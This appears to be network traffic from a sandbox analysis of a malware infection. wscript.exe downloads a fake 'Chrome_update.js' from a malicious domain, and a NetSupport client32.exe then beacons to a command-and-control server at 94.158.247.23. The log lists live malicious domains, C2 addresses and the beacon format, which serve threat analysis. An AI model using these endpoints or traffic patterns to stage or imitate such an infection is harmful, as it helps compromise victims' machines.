Aug 2, 2023 10:35:31.954967022 CEST	8.8.8.8	192.168.2.4	0x634	No error (0)	geography.netsupportsoftware.com		51.142.119.24	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

magydostravel.com

mangoairsoft.com

94.158.247.23connection: keep-alivecmd=pollinfo=1ack=1

94.158.247.23connection: keep-alivecmd=encdes=1data=u2hr4]%y-=id3wi7?=@ff&t[6ralin#rtr5=ifksjds(mqyz8'4dv{rsm%=n;=j=js:x>w~k=n+|*9w_z8a ]

94.158.247.23connection: keep-alivecmd=encdes=1data=l3<(t{evk9|||$(m$cwu-=i?sq

geo.netsupportsoftware.com

94.158.247.23connection: keep-alivecmd=encdes=1data=#mhuaag

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49692	185.9.147.166	443	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49693	188.127.230.147	443	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49694	188.127.230.147	443	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49695	188.127.230.147	443	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49696	188.127.230.147	443	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49697	94.158.247.23	5050	C:\ProgramData\client32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 10:35:28.915442944 CEST	3501	OUT	POST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 94.158.247.23Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:
Aug 2, 2023 10:35:29.090390921 CEST	3501	IN	HTTP/1.1 200 OKServer: NetSupport Gateway/1.6 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 60Connection: Keep-AliveCMD=ENCDES=1DATA=g+${ \Wbb)w}oXxf Data Raw: Data Ascii:
Aug 2, 2023 10:35:29.838072062 CEST	3501	OUT	POST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 235Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr4]%y-=ID3Wi7?=@Ff&t[6raLin#rtr5=IfKsJDs(MQYz8'4DV{rSM%=n;=J=JS:X>w~k=n+\|*9W_z8A ] Data Raw: Data Ascii:
Aug 2, 2023 10:35:30.013356924 CEST	3502	IN	HTTP/1.1 200 OKServer: NetSupport Gateway/1.6 (Windows NT)Content-Type: application/x-www-form-urlencodedContent-Length: 152Connection: Keep-AliveCMD=ENCDES=1DATA=u2hr \WhE=I=n~7s4}X),,Dq,()4]%y-A9H=n :!b<DmwN\{'u=@>$Rb'h[TjI Data Raw: Data Ascii:
Aug 2, 2023 10:35:30.176525116 CEST	3502	OUT	POST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 77Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=l3<(T{EVk9\|\|\|$(m$CwU-=I?sq Data Raw: Data Ascii:
Aug 2, 2023 10:36:30.317857981 CEST	3538	OUT	POST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Aug 2, 2023 10:37:30.490075111 CEST	3539	OUT	POST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Aug 2, 2023 10:38:30.546225071 CEST	3539	OUT	POST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 94.158.247.23Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49698	62.172.138.67	80	C:\ProgramData\client32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 10:35:32.634270906 CEST	3503	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Aug 2, 2023 10:35:32.681808949 CEST	3503	IN	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=utf-8 Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Set-Cookie: ASPSESSIONIDCSBQRATC=LGHIJMEAOFGLLCJHCGBMAFMC; path=/ X-Content-Type-Options: nosniff Referrer-Policy: strict-origin-when-cross-origin strict-transport-security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN Date: Wed, 02 Aug 2023 08:35:32 GMT Content-Length: 15 Data Raw: 34 37 2e 31 37 37 32 2c 38 2e 34 32 37 31 39 Data Ascii: 47.1772,8.42719

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49692	185.9.147.166	443	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
2023-08-02 08:35:11 UTC	0	OUT	GET /cdn/91c818ee6e9ec29f8c1.php HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: magydostravel.com
2023-08-02 08:35:11 UTC	0	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 02 Aug 2023 08:35:11 GMT Content-Type: application/octet-stream Content-Length: 588434 Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename=Chrome_update.js Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public
2023-08-02 08:35:11 UTC	0	IN	Data Raw: 0d 0a 2f 2a 5a 67 77 5a 4a 4e 56 78 62 5a 52 75 48 64 63 66 58 45 73 79 44 56 74 4c 62 6a 68 56 71 7a 71 42 4e 41 46 51 77 71 42 51 4c 69 69 63 66 76 71 45 41 78 78 4d 50 69 75 75 4b 6e 5a 46 79 55 68 77 6d 4a 6e 6c 6a 6b 4a 49 4b 79 75 57 58 57 58 75 77 44 54 78 6b 67 46 67 77 4b 46 74 79 70 73 6c 71 43 48 4f 57 56 77 52 70 76 46 73 67 7a 78 48 62 69 77 56 4e 50 42 41 5a 43 47 44 48 77 6b 46 50 6b 41 6b 6f 73 54 6f 65 56 50 50 62 65 46 54 6f 52 68 42 41 44 59 63 65 67 59 55 57 6a 46 4b 4d 55 57 55 44 46 65 6f 72 76 4c 51 65 59 65 77 6e 44 70 57 58 46 4b 76 76 62 51 54 6a 51 41 6b 54 78 56 6b 4f 46 71 63 43 7a 64 69 76 66 51 4e 4e 72 75 63 65 56 59 57 69 71 64 4d 68 66 47 78 76 49 65 52 4d 4f 4d 72 6b 58 48 65 50 4c 74 66 50 4e 55 75 59 68 58 71 6f 53 48 Data Ascii: /*ZgwZJNVxbZRuHdcfXEsyDVtLbjhVqzqBNAFQwqBQLiicfvqEAxxMPiuuKnZFyUhwmJnljkJIKyuWXWXuwDTxkgFgwKFtypslqCHOWVwRpvFsgzxHbiwVNPBAZCGDHwkFPkAkosToeVPPbeFToRhBADYcegYUWjFKMUWUDFeorvLQeYewnDpWXFKvvbQTjQAkTxVkOFqcCzdivfQNNruceVYWiqdMhfGxvIeRMOMrkXHePLtfPNUuYhXqoSH
2023-08-02 08:35:11 UTC	16	IN	Data Raw: 72 66 51 6d 52 6f 6e 4e 6f 72 44 61 43 51 4f 73 5a 55 58 76 50 68 5a 67 44 4b 4a 5a 79 4a 78 70 63 43 48 54 56 51 5a 76 56 4f 66 79 69 46 67 6c 79 69 45 63 71 66 47 4a 6d 64 46 4d 43 5a 70 78 78 54 69 68 7a 58 42 61 4f 69 4e 4d 54 66 4c 4a 4d 71 75 6a 49 6b 77 44 47 69 73 50 70 67 70 43 55 6a 6d 5a 6e 6c 74 5a 76 62 53 73 76 67 68 50 44 53 6c 46 69 7a 56 52 70 4f 76 55 62 4c 62 4e 66 74 69 74 57 4b 4d 6d 6f 6f 50 5a 43 72 74 5a 53 63 77 77 69 41 54 73 69 4f 72 4e 72 50 6a 54 55 6f 63 4e 6a 78 4a 52 4b 54 73 53 6b 52 66 62 73 53 69 50 4f 6c 70 50 70 6f 74 43 46 6b 4d 73 79 72 65 77 4c 56 71 4d 65 79 72 75 47 62 6b 67 61 53 66 54 75 48 63 42 75 47 79 65 62 6d 69 6a 6d 5a 4d 4d 42 44 6f 4b 44 77 55 73 53 7a 75 79 58 68 4f 4d 61 58 53 45 59 6c 75 53 62 48 78 Data Ascii: rfQmRonNorDaCQOsZUXvPhZgDKJZyJxpcCHTVQZvVOfyiFglyiEcqfGJmdFMCZpxxTihzXBaOiNMTfLJMqujIkwDGisPpgpCUjmZnltZvbSsvghPDSlFizVRpOvUbLbNftitWKMmooPZCrtZScwwiATsiOrNrPjTUocNjxJRKTsSkRfbsSiPOlpPpotCFkMsyrewLVqMeyruGbkgaSfTuHcBuGyebmijmZMMBDoKDwUsSzuyXhOMaXSEYluSbHx
2023-08-02 08:35:11 UTC	32	IN	Data Raw: 72 45 42 5a 6e 4d 67 63 72 55 6f 75 57 5a 71 41 59 58 69 57 79 4a 4b 79 57 4c 4c 47 69 49 63 45 6c 55 79 44 57 74 76 6c 48 66 50 79 53 69 76 75 47 6b 74 4c 4c 6d 4e 51 44 45 4d 4e 4d 62 76 4b 45 61 52 67 79 4f 6d 59 70 4a 4b 62 5a 4a 59 41 4c 44 77 53 70 4f 6a 69 4f 65 51 71 48 56 6e 7a 62 52 45 66 75 47 42 57 6c 7a 4a 50 72 51 78 46 67 42 78 4d 51 52 6b 50 6d 52 4b 4c 75 44 7a 73 62 4a 53 50 67 6f 41 62 65 59 61 65 6d 5a 43 4c 49 6e 55 55 6e 42 68 6d 59 57 53 65 57 68 62 47 65 56 4f 42 79 68 5a 52 62 67 4c 6b 65 42 6f 51 5a 42 6c 52 6c 73 77 76 6a 4c 68 48 57 54 74 6c 75 5a 52 75 79 6a 49 54 59 4e 50 6a 4c 56 58 55 4a 4c 70 69 66 6f 71 54 53 70 76 63 76 79 76 53 49 75 62 52 48 58 43 4f 48 59 66 6f 78 49 4f 67 52 50 72 7a 50 67 45 6c 42 46 69 52 77 6c 7a Data Ascii: rEBZnMgcrUouWZqAYXiWyJKyWLLGiIcElUyDWtvlHfPySivuGktLLmNQDEMNMbvKEaRgyOmYpJKbZJYALDwSpOjiOeQqHVnzbREfuGBWlzJPrQxFgBxMQRkPmRKLuDzsbJSPgoAbeYaemZCLInUUnBhmYWSeWhbGeVOByhZRbgLkeBoQZBlRlswvjLhHWTtluZRuyjITYNPjLVXUJLpifoqTSpvcvyvSIubRHXCOHYfoxIOgRPrzPgElBFiRwlz
2023-08-02 08:35:11 UTC	48	IN	Data Raw: 66 52 6d 42 4b 79 54 67 73 52 6c 57 44 45 44 77 49 57 6b 78 43 4b 61 45 6a 6f 42 7a 6c 55 6b 6c 41 7a 67 70 4c 6f 46 5a 71 73 6c 5a 7a 62 74 47 4e 57 6a 66 56 75 45 43 4a 65 52 5a 4b 42 41 6b 68 78 6f 50 62 45 66 4e 75 4c 53 48 53 63 4f 44 41 4a 43 54 62 74 69 49 78 6a 46 58 75 68 70 63 53 53 69 6c 48 58 44 5a 6e 48 79 44 72 45 76 4e 6e 4a 42 57 63 57 66 41 53 59 43 61 4e 4c 6a 58 48 43 76 4e 43 6c 4a 65 42 52 73 78 53 4d 67 6c 76 55 61 76 72 65 79 6a 72 6f 52 5a 4d 5a 56 71 43 72 5a 46 6e 65 49 73 6c 56 71 66 58 6c 4b 43 73 6b 64 78 6b 74 47 59 6f 61 47 76 64 5a 6e 75 55 68 56 52 78 56 41 73 61 41 49 47 73 65 53 50 50 45 51 50 74 70 54 53 56 44 68 67 71 59 77 56 78 77 72 75 62 62 66 4e 78 56 4e 54 4d 54 77 43 45 6c 59 71 51 46 76 57 6d 6b 75 6a 66 66 73 Data Ascii: fRmBKyTgsRlWDEDwIWkxCKaEjoBzlUklAzgpLoFZqslZzbtGNWjfVuECJeRZKBAkhxoPbEfNuLSHScODAJCTbtiIxjFXuhpcSSilHXDZnHyDrEvNnJBWcWfASYCaNLjXHCvNClJeBRsxSMglvUavreyjroRZMZVqCrZFneIslVqfXlKCskdxktGYoaGvdZnuUhVRxVAsaAIGseSPPEQPtpTSVDhgqYwVxwrubbfNxVNTMTwCElYqQFvWmkujffs
2023-08-02 08:35:11 UTC	64	IN	Data Raw: 59 4e 75 51 45 52 77 76 78 72 67 4f 42 65 50 50 65 76 56 6a 6c 49 66 62 55 73 79 4a 42 48 54 4d 43 75 63 5a 51 56 4e 66 79 52 4f 6c 75 68 4a 57 4a 54 58 70 65 78 48 7a 6f 74 78 65 69 69 4c 6c 43 64 73 79 69 6f 42 61 4b 69 57 6d 65 46 43 67 6d 5a 4e 54 4d 48 63 73 65 4c 54 56 63 4a 4b 74 68 49 6f 46 46 62 74 71 72 75 46 53 44 7a 53 41 7a 64 65 6a 6c 6b 4d 54 50 6e 78 45 56 53 48 74 6a 5a 74 67 6d 76 51 6e 67 69 59 5a 7a 75 53 65 59 51 57 59 54 45 66 59 68 67 46 68 42 4a 77 65 47 6e 72 6b 46 4e 4a 64 79 4f 48 65 70 63 79 45 71 76 62 6a 6a 6b 79 67 73 65 79 49 6b 4a 58 58 49 48 63 6d 6c 4a 69 46 42 50 6a 65 70 6f 70 48 4b 75 68 6b 75 4e 72 77 71 41 69 74 57 67 4b 5a 58 77 44 78 57 45 6b 74 6f 57 42 61 4c 69 7a 78 7a 4f 70 46 4f 75 76 77 48 4e 41 49 50 48 45 Data Ascii: YNuQERwvxrgOBePPevVjlIfbUsyJBHTMCucZQVNfyROluhJWJTXpexHzotxeiiLlCdsyioBaKiWmeFCgmZNTMHcseLTVcJKthIoFFbtqruFSDzSAzdejlkMTPnxEVSHtjZtgmvQngiYZzuSeYQWYTEfYhgFhBJweGnrkFNJdyOHepcyEqvbjjkygseyIkJXXIHcmlJiFBPjepopHKuhkuNrwqAitWgKZXwDxWEktoWBaLizxzOpFOuvwHNAIPHE
2023-08-02 08:35:11 UTC	80	IN	Data Raw: 58 4a 4f 7a 6e 5a 48 6f 68 52 6a 77 4a 41 69 63 47 55 58 77 44 6e 46 5a 52 79 52 42 69 5a 63 45 43 51 73 67 4b 79 44 79 48 70 78 43 49 71 79 75 6b 49 4f 44 71 4d 41 55 4c 6a 6b 4e 45 5a 73 69 71 59 66 41 74 77 70 4a 6d 71 7a 74 49 6f 62 77 46 7a 4d 51 71 53 54 57 47 74 52 61 67 41 44 50 4f 6a 68 6f 4f 43 47 57 76 76 4a 52 64 7a 50 6d 6b 67 4c 49 69 51 65 65 43 4b 54 62 71 4f 64 51 78 4b 4a 43 48 63 75 62 6a 48 69 73 59 62 43 74 70 47 49 4f 47 78 4d 6a 68 59 53 74 59 7a 4f 43 52 44 6d 47 6e 62 61 58 6b 42 7a 79 66 76 66 72 69 49 6e 4c 53 65 65 5a 4d 64 58 4b 41 4b 75 70 67 4c 70 76 77 6d 4b 5a 64 6c 62 45 6f 48 47 58 67 51 51 57 48 54 53 4f 4a 6e 45 4a 70 6f 57 6f 74 53 78 51 62 71 58 6c 71 6b 79 6b 54 75 5a 44 75 71 6b 61 51 75 79 4f 62 7a 7a 53 54 72 61 Data Ascii: XJOznZHohRjwJAicGUXwDnFZRyRBiZcECQsgKyDyHpxCIqyukIODqMAULjkNEZsiqYfAtwpJmqztIobwFzMQqSTWGtRagADPOjhoOCGWvvJRdzPmkgLIiQeeCKTbqOdQxKJCHcubjHisYbCtpGIOGxMjhYStYzOCRDmGnbaXkBzyfvfriInLSeeZMdXKAKupgLpvwmKZdlbEoHGXgQQWHTSOJnEJpoWotSxQbqXlqkykTuZDuqkaQuyObzzSTra
2023-08-02 08:35:11 UTC	96	IN	Data Raw: 70 43 51 4e 75 46 71 6b 53 4c 78 59 79 43 61 77 45 64 66 44 54 48 45 45 52 53 7a 48 76 72 6d 62 4e 66 68 74 73 74 4e 69 57 69 68 4d 6b 54 77 6d 6e 64 4d 51 72 41 72 72 70 43 6d 41 6f 6f 44 6e 63 5a 66 66 6b 6c 44 46 51 43 6b 4d 53 47 7a 74 6a 66 42 52 72 48 75 52 4b 65 64 64 45 78 57 70 61 43 4a 49 79 55 4d 47 57 73 41 51 59 56 56 41 6c 6b 61 71 50 6b 63 63 47 56 6c 4c 62 42 49 6b 44 75 78 72 4a 77 63 74 70 54 48 58 58 77 54 79 51 64 42 55 6c 6b 46 54 49 74 6d 74 6f 6e 45 57 4f 74 69 6a 7a 62 48 55 6c 71 49 76 68 4a 64 4a 67 48 66 49 64 47 65 79 64 6b 77 6c 4a 65 69 57 4c 50 43 70 51 76 4f 74 68 4e 4e 45 45 6a 4c 64 46 6a 41 66 41 5a 53 73 67 6b 50 46 4c 4d 74 70 4c 78 51 6c 6c 77 4b 64 6b 51 77 46 4a 6d 58 50 72 51 58 4a 41 78 64 4b 63 6d 4a 5a 57 79 4d Data Ascii: pCQNuFqkSLxYyCawEdfDTHEERSzHvrmbNfhtstNiWihMkTwmndMQrArrpCmAooDncZffklDFQCkMSGztjfBRrHuRKeddExWpaCJIyUMGWsAQYVVAlkaqPkccGVlLbBIkDuxrJwctpTHXXwTyQdBUlkFTItmtonEWOtijzbHUlqIvhJdJgHfIdGeydkwlJeiWLPCpQvOthNNEEjLdFjAfAZSsgkPFLMtpLxQllwKdkQwFJmXPrQXJAxdKcmJZWyM
2023-08-02 08:35:11 UTC	112	IN	Data Raw: 72 6c 4f 45 52 64 72 4a 49 7a 4c 5a 4d 72 54 68 61 54 50 65 59 63 77 77 46 6e 45 45 61 75 76 4a 50 66 6c 51 52 7a 74 6f 68 43 57 6b 49 6e 4c 58 7a 46 69 59 68 78 6a 71 6a 4d 47 6b 72 74 74 46 50 74 57 73 49 63 79 71 63 65 43 62 78 68 41 72 70 4a 66 59 79 63 6d 67 65 56 78 78 57 45 48 5a 4b 6a 78 52 41 69 72 57 6e 51 49 4e 73 56 7a 6b 4f 75 52 6c 5a 62 66 71 4a 79 47 59 53 42 71 73 57 66 41 56 6f 54 4e 43 43 56 74 62 4d 73 73 52 7a 67 70 4d 4f 61 4b 65 74 4f 42 6f 4d 77 49 6a 55 77 70 6d 4a 4a 78 6b 56 4b 6e 57 54 66 44 6d 73 61 6c 4b 56 69 4b 6d 72 6a 51 57 47 74 52 43 71 6a 78 4a 47 63 64 4a 6e 79 67 69 67 49 4b 42 41 58 59 77 61 57 52 4e 4b 4f 6a 4d 41 56 57 58 64 67 65 4c 42 4f 71 6a 48 77 75 69 55 4c 4c 6e 4a 43 41 71 71 7a 51 74 6a 6f 64 4f 78 54 61 Data Ascii: rlOERdrJIzLZMrThaTPeYcwwFnEEauvJPflQRztohCWkInLXzFiYhxjqjMGkrttFPtWsIcyqceCbxhArpJfYycmgeVxxWEHZKjxRAirWnQINsVzkOuRlZbfqJyGYSBqsWfAVoTNCCVtbMssRzgpMOaKetOBoMwIjUwpmJJxkVKnWTfDmsalKViKmrjQWGtRCqjxJGcdJnygigIKBAXYwaWRNKOjMAVWXdgeLBOqjHwuiULLnJCAqqzQtjodOxTa
2023-08-02 08:35:11 UTC	128	IN	Data Raw: 68 71 4f 57 65 45 6a 72 74 75 58 78 53 6c 75 56 62 75 44 7a 44 64 6d 6d 59 78 62 77 62 6b 45 43 4b 7a 52 7a 54 7a 45 57 45 76 54 63 57 7a 6f 6c 79 6b 73 71 75 76 4f 76 6c 51 73 71 53 53 47 6b 5a 42 58 5a 4e 57 4a 46 56 5a 64 52 6e 75 5a 71 7a 49 43 73 54 69 63 66 59 57 71 64 54 4e 5a 58 72 51 62 47 6e 6a 4f 54 70 41 59 6c 48 41 7a 6b 50 47 49 4b 6a 42 44 48 50 63 4b 48 4b 5a 4f 42 4c 4a 77 47 41 63 57 78 6e 54 54 43 71 45 49 57 73 6e 70 56 52 47 55 43 46 48 78 47 55 68 48 66 57 5a 42 4f 70 79 79 65 42 59 53 59 7a 72 4e 4e 57 4f 61 74 41 58 53 50 58 49 74 63 57 43 4c 6f 78 79 64 6a 42 46 57 6e 55 6c 6b 46 65 69 48 4f 50 71 75 49 6e 55 46 47 4a 78 4a 79 6f 56 45 69 70 56 78 75 65 55 72 43 50 62 52 62 48 6f 52 50 55 68 63 57 46 72 46 6b 6b 7a 4d 69 4f 41 4b Data Ascii: hqOWeEjrtuXxSluVbuDzDdmmYxbwbkECKzRzTzEWEvTcWzolyksquvOvlQsqSSGkZBXZNWJFVZdRnuZqzICsTicfYWqdTNZXrQbGnjOTpAYlHAzkPGIKjBDHPcKHKZOBLJwGAcWxnTTCqEIWsnpVRGUCFHxGUhHfWZBOpyyeBYSYzrNNWOatAXSPXItcWCLoxydjBFWnUlkFeiHOPquInUFGJxJyoVEipVxueUrCPbRbHoRPUhcWFrFkkzMiOAK
2023-08-02 08:35:11 UTC	144	IN	Data Raw: 62 69 6e 64 71 51 51 48 64 52 57 58 6b 62 45 6b 58 59 55 56 45 50 54 4b 4e 6c 7a 44 66 6f 79 52 6b 67 4f 52 68 57 79 78 65 56 43 72 55 70 49 57 54 77 70 46 59 78 6f 52 6e 7a 43 4f 44 4c 49 76 68 77 6a 50 57 57 64 48 6c 6b 4f 68 4c 71 77 4b 66 49 75 65 70 54 41 65 69 78 48 71 71 63 6a 52 78 4e 78 62 6a 4a 4c 58 42 4b 53 6a 4f 79 72 56 5a 6b 6a 6e 75 62 6f 68 79 64 56 4f 57 76 4d 74 6f 7a 79 69 65 72 6b 6a 45 58 71 62 5a 79 4a 57 70 6f 76 78 49 55 70 43 62 6a 64 66 6f 47 49 55 7a 62 58 6a 6b 59 41 68 68 73 62 6d 6f 58 49 55 5a 49 61 63 49 54 48 61 48 63 70 73 59 68 72 55 70 5a 6a 65 4d 68 6a 51 4c 57 67 5a 6a 74 61 65 6c 43 42 64 4a 42 74 54 55 44 48 4f 6f 58 74 6a 61 50 79 49 4b 70 6f 4e 5a 6f 4e 62 4c 71 68 71 58 6b 64 67 72 6f 52 67 76 76 6e 4e 79 74 4c Data Ascii: bindqQQHdRWXkbEkXYUVEPTKNlzDfoyRkgORhWyxeVCrUpIWTwpFYxoRnzCODLIvhwjPWWdHlkOhLqwKfIuepTAeixHqqcjRxNxbjJLXBKSjOyrVZkjnubohydVOWvMtozyierkjEXqbZyJWpovxIUpCbjdfoGIUzbXjkYAhhsbmoXIUZIacITHaHcpsYhrUpZjeMhjQLWgZjtaelCBdJBtTUDHOoXtjaPyIKpoNZoNbLqhqXkdgroRgvvnNytL
2023-08-02 08:35:11 UTC	160	IN	Data Raw: 7a 4e 78 55 76 45 6c 4a 62 4d 49 69 56 50 6b 57 48 57 47 4f 6a 6d 61 70 58 55 4f 41 46 57 51 6e 6e 4e 78 4e 75 7a 57 6f 57 76 76 44 65 79 47 54 4e 55 47 77 6a 44 78 70 44 7a 55 51 74 6b 6f 67 63 68 50 44 76 41 71 7a 6d 51 44 77 5a 4b 64 4f 44 48 75 70 42 69 57 6e 42 6f 44 6e 43 4b 58 45 59 61 4b 4d 79 44 54 64 50 52 64 65 57 4c 74 67 52 45 44 70 51 4b 54 48 4c 75 50 50 45 66 58 5a 4e 43 53 58 71 69 77 4d 76 6e 45 65 6f 48 6e 72 44 7a 50 4c 58 68 43 73 70 44 79 68 62 74 67 68 72 70 66 6d 63 4b 6c 7a 69 68 58 67 52 63 72 6b 7a 62 6c 61 73 44 4f 5a 55 53 4e 49 6d 4b 51 57 70 68 50 69 43 45 41 44 5a 48 52 4c 53 66 65 70 52 45 41 52 48 69 6d 57 42 65 4d 45 61 7a 53 54 65 50 72 72 4e 63 66 66 63 5a 7a 45 4a 55 72 78 75 52 4a 65 6a 7a 6f 77 79 48 6c 42 6a 43 53 Data Ascii: zNxUvElJbMIiVPkWHWGOjmapXUOAFWQnnNxNuzWoWvvDeyGTNUGwjDxpDzUQtkogchPDvAqzmQDwZKdODHupBiWnBoDnCKXEYaKMyDTdPRdeWLtgREDpQKTHLuPPEfXZNCSXqiwMvnEeoHnrDzPLXhCspDyhbtghrpfmcKlzihXgRcrkzblasDOZUSNImKQWphPiCEADZHRLSfepREARHimWBeMEazSTePrrNcffcZzEJUrxuRJejzowyHlBjCS
2023-08-02 08:35:11 UTC	176	IN	Data Raw: 46 78 4d 72 71 6e 71 41 5a 63 74 6b 4b 64 6b 59 6f 68 6b 43 64 4d 6e 47 67 70 64 6f 6d 4a 42 46 75 62 59 63 79 58 65 48 6a 4d 6c 72 77 4c 67 53 4c 47 70 75 48 54 6d 4c 48 70 51 41 70 6e 6e 4f 6d 55 48 48 75 59 47 4b 4c 64 4b 41 47 6a 72 58 4a 79 67 4d 4d 65 43 45 4b 50 78 67 4f 50 6a 6e 4b 76 63 4c 6b 6c 46 41 56 6e 78 77 4a 63 49 4c 6c 65 52 64 58 41 68 43 4c 69 4c 62 4c 78 75 6d 43 54 71 67 4c 56 66 4c 69 61 42 78 72 56 57 44 6c 50 45 52 78 7a 42 7a 7a 5a 51 51 53 73 57 68 6b 47 70 70 56 6d 50 59 4d 4c 67 50 71 67 6d 71 72 54 49 56 67 55 50 53 74 67 56 57 48 50 78 46 53 74 46 62 4d 72 76 44 49 6f 6e 68 62 72 61 51 75 4b 51 4d 65 43 76 64 79 6b 4e 7a 74 61 6e 61 69 75 4b 51 54 4a 66 68 4b 62 50 6f 57 6c 4a 59 77 49 54 4d 41 55 55 50 4d 4c 78 72 7a 73 71 Data Ascii: FxMrqnqAZctkKdkYohkCdMnGgpdomJBFubYcyXeHjMlrwLgSLGpuHTmLHpQApnnOmUHHuYGKLdKAGjrXJygMMeCEKPxgOPjnKvcLklFAVnxwJcILleRdXAhCLiLbLxumCTqgLVfLiaBxrVWDlPERxzBzzZQQSsWhkGppVmPYMLgPqgmqrTIVgUPStgVWHPxFStFbMrvDIonhbraQuKQMeCvdykNztanaiuKQTJfhKbPoWlJYwITMAUUPMLxrzsq
2023-08-02 08:35:11 UTC	192	IN	Data Raw: 54 61 68 7a 61 6b 6d 4b 4e 7a 5a 78 4e 77 6b 45 45 68 7a 78 52 62 4c 68 72 4e 71 41 76 44 6c 4c 71 73 66 6e 78 4a 74 66 69 6f 49 54 79 58 55 65 59 65 72 67 59 54 42 54 70 58 55 6f 72 66 58 4b 6c 44 73 58 68 4e 48 67 42 55 78 43 72 51 44 6f 68 59 4d 4a 68 4f 65 67 64 72 50 6a 6b 43 6a 56 4d 51 62 4b 70 4b 6e 76 4b 45 4a 49 43 4b 4f 73 65 4a 6e 6c 5a 6e 4c 50 46 72 6b 4f 4b 68 64 68 43 44 50 6b 4c 72 64 55 4e 70 44 6a 71 41 74 79 64 47 46 79 5a 50 46 50 54 69 61 79 55 6b 52 59 74 66 61 48 69 48 4a 79 57 6b 4e 4a 4a 6f 44 43 6a 76 49 77 48 68 59 63 70 63 65 4d 79 72 4e 66 63 74 4d 58 74 76 4b 6c 50 77 51 4e 62 66 66 50 67 78 58 71 45 78 76 78 56 43 72 48 45 4f 69 56 51 53 57 45 51 71 69 78 71 54 59 67 70 63 4e 66 44 57 72 41 59 72 55 56 62 5a 58 7a 43 45 56 Data Ascii: TahzakmKNzZxNwkEEhzxRbLhrNqAvDlLqsfnxJtfioITyXUeYergYTBTpXUorfXKlDsXhNHgBUxCrQDohYMJhOegdrPjkCjVMQbKpKnvKEJICKOseJnlZnLPFrkOKhdhCDPkLrdUNpDjqAtydGFyZPFPTiayUkRYtfaHiHJyWkNJJoDCjvIwHhYcpceMyrNfctMXtvKlPwQNbffPgxXqExvxVCrHEOiVQSWEQqixqTYgpcNfDWrAYrUVbZXzCEV
2023-08-02 08:35:11 UTC	208	IN	Data Raw: 68 67 45 76 7a 62 49 4d 45 68 62 57 66 44 52 4b 54 6a 76 73 74 79 42 45 48 69 65 57 6b 72 4e 55 72 41 43 6a 4c 55 4e 69 54 41 4e 64 78 69 45 6b 51 6c 79 6b 6a 4d 6d 58 4d 6b 7a 73 57 68 76 61 55 66 4e 48 48 6e 58 6f 6b 51 44 53 47 53 6f 79 6e 65 6c 74 4e 6a 72 78 57 4f 54 65 74 48 73 59 69 54 51 51 6b 6a 52 73 63 45 71 68 48 44 52 46 6a 6f 6c 73 48 51 4c 4d 6b 67 53 5a 59 76 75 50 50 73 66 55 71 78 79 54 73 6e 6e 68 78 58 65 49 66 78 61 41 76 64 52 65 79 51 70 48 56 63 58 44 73 52 62 73 4c 67 56 65 70 69 73 68 56 52 5a 48 78 52 56 6e 6b 78 6f 4d 4c 44 7a 65 6f 58 48 4f 68 59 7a 55 66 70 4d 78 74 6c 59 43 4a 56 46 61 42 5a 46 7a 74 63 6a 70 68 4c 48 51 52 4d 65 76 44 62 79 71 47 48 73 78 6c 43 51 62 62 57 50 6f 47 68 64 56 45 64 62 64 4a 55 70 72 48 64 46 Data Ascii: 